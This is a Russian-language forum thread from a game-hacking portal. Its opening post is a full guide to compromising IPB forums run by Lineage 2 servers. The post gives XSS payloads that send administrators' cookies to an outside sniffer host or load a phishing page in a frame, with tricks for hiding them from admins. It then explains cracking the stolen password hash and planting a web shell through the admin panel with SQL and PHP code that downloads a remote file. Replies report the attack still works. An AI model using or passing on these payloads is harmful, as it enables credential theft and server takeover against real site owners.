Вернуться   D3Scene.Ru Софт портал игр | Хаки | Проги | Статьи > Онлайн MMO игры > Lineage 2
Присоединяйся к нам

Lineage 2 Одна из популярнейших онлайн игр.



Ответ
 
Опции темы Опции просмотра
Старый 09.03.2010, 23:48   #1
This? On Melancholy Hill




 
Аватар для UnDeaDRoCUser
 
Регистрация: 18.09.2008
Адрес: system32
Сообщений: 5,237
Репутация: 1415
Отправить сообщение для UnDeaDRoCUser с помощью ICQ Отправить сообщение для UnDeaDRoCUser с помощью Skype™
Автор Сообщение

Взлом БазыДанных через IPB форум с xss


[HIDE="5"]Вообщем я нашёл способ взлома сайта а там и бд, через форум ipb с применением xss.

Что такое xss?
Код:
XSS (англ. Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости 

интерактивных информационных систем в вебе. XSS возникает, когда в генерируемые сервером 

страницы по какой-то причине попадают пользовательские скрипты. Специфика подобных атак 

заключается в том, что вместо непосредственной атаки сервера они используют уязвимый 

сервер в качестве средства атаки на клиента.

Иногда для термина используют сокращение «CSS», но чтобы не было путаницы с каскадными 

таблицами стилей, используют сокращение «XSS».

Сейчас XSS составляют около 15 % всех обнаруженных уязвимостей[1]. Долгое время 

программисты не уделяли им должного внимания, считая их неопасными. Однако это мнение 

ошибочно: на странице или в HTTP-Cookie могут быть весьма уязвимые данные (например, 

идентификатор сессии администратора). На популярном сайте скрипт может устроить 

DoS-атакy.
Работает взде где имееться тег acronym

Пример популярных серверов: [Ссылки скрыты от гостей.]

XSS работал бы и на шоках но там слишком длиные сообщения запрещены(в подписи) а в

сообщение отключены эти теги.

Для начала нам нужно узнать включён ли на форуме метод TRACE если же этот метод включён

то нам будет намного легче получить доступ в админку.

Для начала нам нужно зарегестрировать онлайн снифер, я выбрал вот этот

[Ссылки скрыты от гостей.]

Зарегестрировались теперь нужно вставить ваш смайлик вот в этот код:


1)При наведение мышки на _______________...... логи отправляються на сниффер.

Код:
[acronym=[acronym= 

onmouseover=new/**/Image().src="http://sniffer.xaknet.ru/smiles/img__396.gif?"+document.

cookie; ]]______________________________________________________________________________
[/acronym][/acronym]
2)Этот код автоматически (если даже мышку не навели) отправляет лог на снифф НО!

Работает только в Opera!
Код:
[/acronym]
[acronym=[acronym= style=background:url('//') 

onerror=new/**/Image().src="http://sniffer.xaknet.ru/smiles/img__396.gif?"+document.cook

ie; ]][/acronym][/acronym]
В данном случае [Ссылки скрыты от гостей.] моя ссылка на снифер,

поэтому заходим в снифер и во вкладке Promo смотрим свой адрес на картинку и

вставляем в код (который выше)

Теперь идём на форум который хотим взломать и пишим новое сообщение себе для проверки



Нажимаем отправить
Смотрим своё сообщение во входящих, там будет сообщение вида '> но мы не обращаем

внимание (если вы вставили второй код который выше то наведите мышку на текст

__________________) и идём на наш снифер [Ссылки скрыты от гостей.]
И смотрим логи
Если логов нету значит вы использовали не oper'y а ie(internet explorer, или firefox и

т.п.)

Если в логах есть pass_hash значит trace включён.



Тогда мы делаем так:
1) Идём в профиль и нажимаем Изменить подпись
2) Вставляем ваш код который вы тестировали
3) Пишим в лс админу сайта (Лучше главному админу) пишем любое сообщение.Внимание! Если

вы вставили код в подпись тогда вам ненужно будет вставлять код в сообщение т.к. пр

ипрочтение письма будет и отображаться ваша подпись! Если же на форуме запрещены теги в

подписе тогда вставляем код в сообщение и отправляем админу.(Прежде чем ставить в

подпись замасккируйте чтобы ничего небыло видно в подписе об этом смотрите дальше)
4) Ждём когда админ прочитает сообщение и логи будут в вашем снифере.
5) После получения куков(логов) там будет строка

pass_hash=c18c047c77589bрa989cc327509e7d5e;
18c047c77589bрa989cc327509e7d5e это и есть наш пароль только зашифрованный в md5, теперь

вам нужно расшифровать его прогой PasswordsPro или же воспользуемся онлайн сервисами

расшифровки.
[Ссылки скрыты от гостей.]
[Ссылки скрыты от гостей.]

После расшифровки вам будет указан пасс под которым мы будем заходить в админку, где и

как залить шелл смотрите дальше.



2.1) Так же есть другой способ для кражи паролей фейком если метод TRACE выключен или же

вы неможете расшифровать пароль.
Что нам потребуеться:
1) Фейк вашего форума где авторизация [Ссылки скрыты от гостей.]
2) Хостинг куда вы будете заливать фейк ( я выбрал freehostia.com но там нужна почта в

зоне .com зарегать почту можно на pochta.com)


Есть два кода:

1)Автоматические открытие фейка во фрейме (Работает только в опере!)
[acronym=[acronym= style=background:url('//')

onerror=document.write("\x3C******\x20src=http://l2fan-day.ru.freehostia.com/\x20framebo

rder=0\x20width=100%\x20height=100%\x20scrolling=y es\x3E\x3C/******\x3E");document.close

(); ]][/acronym][/acronym]


2) Открытие фейка при наведение на текст ________..... (Работает везде)
[acronym=[acronym=

onmouseover=document.write("\x3C******\x20src=http ://l2fan-day.ru.freehostia.com/\x20fra

meborder=0\x20width=100%\x20height=100%\x20scrolli ng=yes\x3E\x3C/******\x3E");document.c

lose();

]__________________________________________________ _____________________][/acronym][/acr

onym]

И так, отправляем опять же сообщение самому себе (смотрите выше) с кодом который выше (с

1 или вторым)
Читаем своё сообщение и упс вас перекинуло на фейк (Обратите внимание на

адрес! Адрес неизменился!)
Теперь делаем вот такие глаза Оо и вставляем 1 или 2 код в сообщение

(незабудьте скрыть его, как это сделать описано ниже) или лучше в

подпись, и отправляем админу в лс. Так же можно написать на форуме сообщение, так вы

сможете собрать пароли не только админов.



И так вот например админ что то заподозрил у вас в подписе и решил проверитьподпись а

там адрес фейка, и вы сразу получаете бан.
Чтобы такого небыло ваш адрес нужно закодировать, для этого идём сюда

[Ссылки скрыты от гостей.]
В самом низу вводим адрес фейка и нажимаем на Encode



И получаем символы что то типа этого
http://&#x6C ;&# x32;fan-d&#x6

1;y.ru.fr&#x65 ; ehosti&#

x61;.com/

Теперь вставляем в код вместо адреса и у нас получаеться вот так:
Код:
[acronym=[acronym= style=background:url('//') 

onerror=document.write("\x3C******\x20src=http://&#x6

C;2fan-day.ru.fr&#

x65;ehostia.com\x20frameborder=0\

x20width=100%\x20height=100%\x20scrolling=yes\x3E\x3C/******\x3E");document.close(); 

]][/acronym][/acronym]
Код:
[acronym=[acronym= 

onmouseover=document.write("\x3C******\x20src=http://

l2fan-day.ru.f&#x7

2;eehostia.com\x20frameborde

r=0\x20width=100%\x20height=100%\x20scrolling=yes\x3E\x3C/******\x3E");document.close(); 

]_______________________________________________________________________][/acronym][/acr

onym]
А если админ увидит вот это _________________________________..... и ему покажеться эт о

подозрительным, и опять посмотрит в подпись и опять получите банан, за что? За

непонятный код)
Тогда мы делаем вот так:
1) Идём вот по такому адресу [Ссылки скрыты от гостей.]
2) В опере (правка -> найти) или firefox или internet explorer нажимаем найти и вводим

post2
Там будет что то вроде этого:

Это цвет подписи, то есть мы будем скрывать под цвет.
Код:
Наш код
Где #fff7ad наш цвет
В итоге мы максимально скрыли наш код:

[acronym=[acronym= style=background:url('//')

onerror=document.write("\x3C******\x20src=h&# x74;tp://&#x6

C;2fan-da&#x79 ; .ru.fr&#

x65;ehostia&#x2 E;com\x20frameborder=0\

x20width=100%\x20height=100%\x20scrolling=yes\x3E\ x3C/******\x3E");document.close();

]][/acronym][/acronym]


И так вот мы зашли в админку и нам нужно залить шелл есть несколько способов чтобы

залить шелл:

вариант1:

Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

select 0x3c3f706870696e666f28293b3f3e into outfile

'Z:/home/site.ru/www/uploads/shell.php'

полный путь можно посмотреть так:

-> [Ссылки скрыты от гостей.]

шелл: [Ссылки скрыты от гостей.]

PS: Нужны соответствующие права

вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем

"Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в

списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип

файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или

фотографию?" - да.

Топаем в свой профиль:

[Ссылки скрыты от гостей.]

грузим аву-шелл с расширением php3 и получаем шелл по адресу:

[Ссылки скрыты от гостей.]



Предварительно берём добавляем в типы файлов расшифрение .phtml и ставим mime тип

application/octet-stream , следовательно там же указываем разрешение загрузку аватар и

фотографий.
Потом добавляем в профилях пользователей заливка расшифрений .phtml и размер любой ( чем

больше тем лучше).
Потом спокойно заливаем шелл и в свойствах смотрим путь до шелла.
Причины почему шелл не залился: Стоят права на папки avatars или html/emoticons, стоит

safe-mod.


Идём в "настройки" выбираем любую из них, жмём добавить новую настройку, и в поле

"Выполнение PHP-кода
до отображения или сохранения настройки:" пишем любой php код, например такой:
-----------------------------------------

Код:
$linky="http://сайт_с_шеллом/shell.txt"; 
$saved="/home//www/123/forum/uploads/123.php"; 
$from=fopen("$linky","r"); 
$to=fopen("$saved","w"); 
while(!feof($from)){ 
$string=fgets($from,4096); 
fputs($to,$string); 
} 
fclose($to); 
echo 'done';
fclose($from);
Веб шелл найдёте сами) google.com вам в помощь лично я юзаю
[Ссылки скрыты от гостей.]
или
[Ссылки скрыты от гостей.]

После того как вы залили шелл идёте в самый корень где сде находиться сайт и ищете конфиг где настройки подключения к бд.
На asterios xss работает только в сообщение при ответе он увидит ваш xss так что лучше не рискуйте)

Если будет возможность буду обновлять этот пост, сейчас я ищу возможность чтобы xss автоматически срабатывало в ie(internet explorer и firefox и т.п.)
P.S. Если здесь водяться крысы прошу оставить хотябы имя автора)

Специально для ©zhyk.ru by m0nk

Это цвет подписи, то есть мы будем скрывать под цвет.
Код:
наш код
на [*color="#fff7ad"]наш код[/color*] и поясните что без *


Добавлено через 37 минут
Чтобы не мучаться с TRACE используйте утилиту [Ссылки скрыты от гостей.]
Она вам покажет включён ли trace или нет[/HIDE]
Изображения
Тип файла: png l2screen1.PNG (184.6 Кб, 201 просмотров)
Тип файла: png l2screen2.PNG (165.8 Кб, 183 просмотров)
Тип файла: png l2screen3.PNG (10.5 Кб, 181 просмотров)
Тип файла: png l2screen4.PNG (82.5 Кб, 186 просмотров)
__________________
[ [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | ]

[ [Ссылки скрыты от гостей.] ]

  Ответить с цитированием Наверх
Старый 10.03.2010, 13:07   #2
Местный
 
Аватар для MonoLite
 
Регистрация: 02.04.2009
Сообщений: 70
Репутация: 4
По умолчанию

Цитата:
Работает только в Opera!
Какая версия оперы ?
  Ответить с цитированием Наверх
Старый 10.03.2010, 13:10   #3
Гость_за_инактив
 
Аватар для xTiMx
 
Регистрация: 07.02.2010
Адрес: /windows/system32
Сообщений: 7
Репутация: 1
Отправить сообщение для xTiMx с помощью ICQ Отправить сообщение для xTiMx с помощью Skype™
По умолчанию

Базы данных форума или база данных сервера?)
  Ответить с цитированием Наверх
Старый 10.03.2010, 13:54   #4
Бан
 
Аватар для Class1cxD
 
Регистрация: 19.06.2009
Сообщений: 209
Репутация: 74
По умолчанию

форума лол IPB это форум если че IPB выпустил уже патч походу уже фиксануло этот баг
  Ответить с цитированием Наверх
Старый 10.03.2010, 14:05   #5
This? On Melancholy Hill




 
Аватар для UnDeaDRoCUser
 
Регистрация: 18.09.2008
Адрес: system32
Сообщений: 5,237
Репутация: 1415
Отправить сообщение для UnDeaDRoCUser с помощью ICQ Отправить сообщение для UnDeaDRoCUser с помощью Skype™
Автор По умолчанию

Class1c, Есть шанс что не все обновились..
__________________
[ [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | ]

[ [Ссылки скрыты от гостей.] ]

  Ответить с цитированием Наверх
Старый 10.03.2010, 14:49   #6
Бан
 
Аватар для Class1cxD
 
Регистрация: 19.06.2009
Сообщений: 209
Репутация: 74
По умолчанию

Цитата:
Сообщение от UnDeaDRoCUser Посмотреть сообщение
Class1c, Есть шанс что не все обновились..
Топ сервера обновили ибо я ломал так пока это ен пустили в паб.
  Ответить с цитированием Наверх
Старый 02.04.2010, 02:23   #7
Бан
 
Аватар для Me1oman
 
Регистрация: 02.04.2010
Сообщений: 7
Репутация: -5
По умолчанию

До сих пор работает мною лично проверенно а фейком и подавно работает. Просто вопрос остается брутить хэш...
  Ответить с цитированием Наверх
Старый 11.05.2010, 15:35   #8
Гость_за_инактив
 
Аватар для z0mbie
 
Регистрация: 11.05.2010
Сообщений: 2
Репутация: 1
По умолчанию

патч уже давно выпущен был но никто на него не обратил внимания, и если кое что доработать то он будет работать на всех браузерах, также если кое что добавить , то в куки будет добавлятьсяс строка и после второго просмотра кидать на фейк не будет
  Ответить с цитированием Наверх
Старый 20.05.2011, 09:58   #9
Местный
 
Аватар для JustFire
 
Регистрация: 21.01.2011
Сообщений: 59
Репутация: 2
По умолчанию

проверил на днях пару гфш, баг еще актуален
  Ответить с цитированием Наверх
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Powered by vBulletin
Copyright © 2017 vBulletin Solutions, Inc.
Перевод: zCarot | Дизайн: G-A | Верстка: OldEr
Текущее время: 09:13. Часовой пояс GMT +4.